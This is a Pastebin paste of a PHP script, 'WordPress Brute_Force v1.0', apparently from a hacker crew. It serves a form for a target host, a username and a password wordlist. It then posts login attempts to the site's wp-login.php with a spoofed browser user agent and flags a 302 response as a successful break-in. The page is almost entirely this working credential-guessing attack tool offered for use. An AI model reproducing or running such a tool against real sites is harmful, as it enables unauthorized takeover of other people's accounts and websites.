API tools faq
paste
Guest User

Wp brute

a guest
Oct 27th, 2018
128
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.25 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. /*!
  4. WordPress Brute_Force v1.0
  5. Author: AdeRoot
  6. date: 08/09/2015
  7. Greetz:Bruce_Dickinson, TheShow, HackerRage
  8. !*/
  9.  
  10. set_time_limit(0);
  11. error_reporting(0);
  12.  
  13. class Wp{
  14.  
  15. private $host;
  16. private $user;
  17. private $open;
  18. private $lista;
  19.  
  20. public function banner() {
  21. echo("
  22. <html>
  23. <head>
  24. <title>Wp-Brute Force</title>
  25. <style type='text/css'>
  26. body{
  27. font-family:'Times New Roman';
  28. font-size:20px;
  29. background-color:#000000;
  30. color:#FFA500;
  31. font-style:Italic;
  32.  
  33. }
  34.  
  35. .ext{
  36. color: #00FFFF;
  37. }
  38.  
  39. .area{
  40. width:400px;
  41. height:350px;
  42. resize:none;
  43. }
  44.  
  45. </style>
  46. </head>
  47. <body>
  48. <h1><center>WordPress Brute_Force v1.0</center></h1>
  49. <form action='' method='POST'>
  50. <div align='right' class='ext'>Author: AdeRoot<br>
  51. IBMbLack CreW</div>
  52. Host:<input type='text' name='host' size='40'><br>
  53. User:<input type='text' name='user' size='25'><br>
  54. <center>Wordlist</center>
  55. <center><textarea class='area' name='lista'></textarea><br><br><center>
  56. <center><input type='Submit' value='Start'></center>
  57. </form>
  58. </body>
  59. </html>");
  60. }
  61.  
  62. public function extract_post() {
  63. $this->host = $_POST["host"];
  64. $this->user = $_POST["user"];
  65. $this->open = $_POST["lista"];
  66. }
  67.  
  68. public function Xregex() {
  69. if(preg_match("@/wp-login.php@", $this->host)) {
  70. return true;
  71. } else {
  72. $this->host = $_POST["host"]."/wp-login.php";
  73. }
  74. }
  75.  
  76. public function brute() {
  77. $lista = array_filter(explode("\n", $this->open));
  78. foreach($lista as $this->lista) {
  79. for($i=0; $i < count($this->lista); $i++) {
  80. $this->Xcurl();
  81. }
  82. }
  83. }
  84.  
  85. private function cool() {
  86. echo "Host:"."<font color='white'>{$this->host}</font>";
  87. echo " User:"."<font color='white'>{$this->user}</font>";
  88. echo " Pass:"."<font color='white'>{$this->lista}</font>";
  89. }
  90.  
  91. private function Xcurl() {
  92. $curl = curl_init();
  93. curl_setopt($curl, CURLOPT_URL, $this->host);
  94. curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
  95. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  96. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
  97. curl_setopt($curl, CURLOPT_POST, true);
  98. curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->lista&wp-submit=Login&redirect_to=$this->host/wp-admin/");
  99. $exec = curl_exec($curl);
  100. $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
  101. $this->cool();
  102. if($http == 302) {
  103. echo "<font color='#00FF00'> [+] Successfull!!</font><br>";
  104. break;
  105. } else {
  106. echo "<font color='red'>Failed</font><br>";
  107. }
  108. curl_close($curl);
  109. }
  110. }
  111.  
  112. $wp = new Wp();
  113. $wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
  114. $wp->banner();
  115. $wp->extract_post();
  116. $wp->Xregex();
  117. $wp->brute();
  118. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!